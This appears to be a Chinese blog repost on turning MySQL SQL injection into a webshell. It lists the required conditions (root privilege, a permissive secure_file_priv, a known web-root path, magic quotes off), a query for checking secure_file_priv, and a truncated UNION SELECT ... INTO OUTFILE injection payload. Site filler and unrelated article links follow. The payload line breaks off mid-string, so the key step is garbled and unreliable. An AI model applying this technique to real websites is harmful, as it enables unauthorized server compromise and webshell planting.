mysql注入getshell
2021/5/23 2:27:58
本文主要是介绍mysql注入getshell,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
0x00 利用条件
- root权限
- secure_file_priv=为空或者在网站根目录下(网站根目录为d:\www,secure_file_priv=d:\也可以)
- 知道绝对路径
- gpc关闭,这个应该是php的,会转义单引号,选择路径的时候一定需要单引号
0x01 查看secure_file_priv设置
show global variables like '%secure_file_priv%';
查询结果
- 5.7.26为null,5.5.29为空
这里为NULL
0x02 联合注入写shell
select * from users where id=-1 union select 1,2,'' into outfile 'D
这篇关于mysql注入getshell的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-10-23BinLog入门:新手必读的MySQL二进制日志指南
- 2024-10-23Binlog入门:MySQL数据库的日志管理指南
- 2024-10-22MySQL数据库入门教程:从安装到基本操作
- 2024-10-22MySQL读写分离入门教程:轻松实现数据库性能提升
- 2024-10-22MySQL分库分表入门教程
- 2024-10-22MySQL慢查询的诊断与优化指南
- 2024-10-22MySQL索引入门教程:快速理解与应用指南
- 2024-10-22MySQL基础入门教程:从安装到基本操作
- 2024-10-22MySQL数据库中的Binlog详解与操作教程
- 2024-10-12部署MySQL集群项目实战:新手入门教程